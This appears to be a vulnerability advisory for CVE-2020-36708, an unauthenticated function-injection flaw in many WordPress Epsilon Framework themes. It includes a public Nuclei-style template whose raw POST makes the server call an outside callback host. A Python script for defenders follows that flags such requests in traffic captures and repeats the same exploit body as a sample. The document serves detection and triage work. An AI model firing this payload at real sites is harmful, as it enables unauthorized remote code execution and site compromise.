CVE-2020-36708: WordPress Epsilon Framework Themes <=2.4.8 - Remote Code Execution

Date: 2025-08-01 | Affected software: WordPress Epsilon Framework Themes | PoC: Public

Vulnerability Description

WordPress themes including Shapely <= 1.2.7, NewsMag <= 2.4.1, Activello <= 1.4.0, Illdy <= 2.1.4, Allegiant <= 1.2.2, Newspaper X <= 1.3.1, Pixova Lite <= 2.0.5, Brilliance <= 1.2.7, MedZone Lite <= 1.2.4, Regina Lite <= 2.0.4, Transcend <= 1.1.8, Affluent <= 1.1.0, Bonkers <= 1.0.4, Antreas <= 1.0.2, Sparkling <= 2.4.8, and NatureMag Lite <= 1.0.4 contain a function injection vulnerability in epsilon_framework_ajax_action that lets unauthenticated attackers call functions and achieve remote code execution. Exploitation requires no authentication.

PoC Code [Public]

id: CVE-2020-36708

info:
  name: WordPress Epsilon Framework Themes <=2.4.8 - Remote Code Execution
  author: madrobot
  severity: critical
  description: |
    WordPress themes including Shapely <= 1.2.7, NewsMag <= 2.4.1, Activello <= 1.4.0, Illdy <= 2.1.4, Allegiant <= 1.2.2, Newspaper X <= 1.3.1, Pixova Lite <= 2.0.5, Brilliance <= 1.2.7, MedZone Lite <= 1.2.4, Regina Lite <= 2.0.4, Transcend <= 1.1.8, Affluent <= 1.1.0, Bonkers <= 1.0.4, Antreas <= 1.0.2, Sparkling <= 2.4.8, and NatureMag Lite <= 1.0.4 contain a function injection caused by epsilon_framework_ajax_action, letting unauthenticated attackers call functions and achieve remote code execution, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can execute arbitrary code remotely, leading to full site compromise.
  remediation: |
    Update themes to the latest versions where the vulnerability is fixed or apply security patches provided by theme developers.
  reference:
    - https://www.exploit-db.com/exploits/49327
    - https://wpscan.com/vulnerability/10417
    - https://wpscan.com/vulnerability/bec52a5b-c892-4763-a962-05da7100eca5
    - https://www.wordfence.com/blog/2020/11/large-scale-attacks-target-epsilon-framework-themes/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b75c322-539d-44e9-8f26-5ff929874b67?source=cve
    - https://blog.nintechnet.com/unauthenticated-function-injection-vulnerability-fixed-in-15-wordpress-themes/
    - https://blog.nintechnet.com/unauthenticated-function-injection-vulnerability-in-wordpress-sparkling-theme/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-36708
    cwe-id: CWE-94
    epss-score: 0.90488
    epss-percentile: 0.99587
    cpe: cpe:2.3:a:colorlib:activello:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: colorlib
    product: activello
    kev: true
    vkev: true
  tags: wordpress,rce,cve,cve2020,edb,wpscan

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=https://oast.me/

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Interactsh Server"
          - "protocol_version"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d0220a2f303aebd4fa3574bb3f588b68d5c500ded6009d7d5e7b7bb92bcfcf6a022100a618d6253e0e06a2abf05d5df88fe26f6e4c9934615e8a6942b1a27201f2dcb8:922c64590222798bb761d5b6d8e72950
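
For defenders triaging traffic to affected sites, the following added example (not part of the template or of any theme's code) parses captured admin-ajax.php requests and reports which class and method each request to the epsilon_framework_ajax_action hook tried to reach. It assumes request bodies are available from a WAF or reverse-proxy capture; the record layout, function names and sample records are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

HOOK = "epsilon_framework_ajax_action"               # AJAX action named in the advisory
TARGET_KEY = re.compile(r"^args\[action\]\[\d*\]$")  # args[action][] or args[action][0]

def inspect_request(query: str, body: str):
    """Return a finding dict if the request addresses the hook, else None."""
    q = parse_qsl(query, keep_blank_values=True)
    b = parse_qsl(body, keep_blank_values=True)
    # The hook name may arrive in the query string or the form body; check both.
    if HOOK not in [v for k, v in q + b if k == "action"]:
        return None
    # PHP collects repeated args[action][] keys into an ordered array.
    target = [v for k, v in b if TARGET_KEY.match(k)]
    extra = {k: v for k, v in b if k.startswith("args[args]")}
    return {
        "callable": "::".join(target) if target else None,
        "arguments": extra,
        "remote_url": any(v.lower().startswith(("http://", "https://"))
                          for v in extra.values()),
    }

def scan(records):
    """records: iterable of (client_ip, query, body); returns (client_ip, finding) pairs."""
    hits = []
    for ip, query, body in records:
        finding = inspect_request(query, body)
        if finding:
            hits.append((ip, finding))
    return hits

# Constructed sample records (documentation IPs); the second body is the one in the template.
SAMPLE = [
    ("192.0.2.10", "", "action=heartbeat&_nonce=abc123&interval=60"),
    ("198.51.100.7", "action=action_name",
     "action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests"
     "&args%5Baction%5D%5B%5D=request_multiple"
     "&args%5Bargs%5D%5B0%5D%5Burl%5D=https://oast.me/"),
    ("203.0.113.5", "action=epsilon_framework_ajax_action",
     "args%5Baction%5D%5B0%5D=Foo&args%5Baction%5D%5B1%5D=bar"),
]

if __name__ == "__main__":
    for ip, f in scan(SAMPLE):
        print(ip, f["callable"], f["remote_url"])
```

Any hit from an unauthenticated client on a site running one of the listed theme versions is worth reviewing; the callable field shows what was requested so the event can be prioritized.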
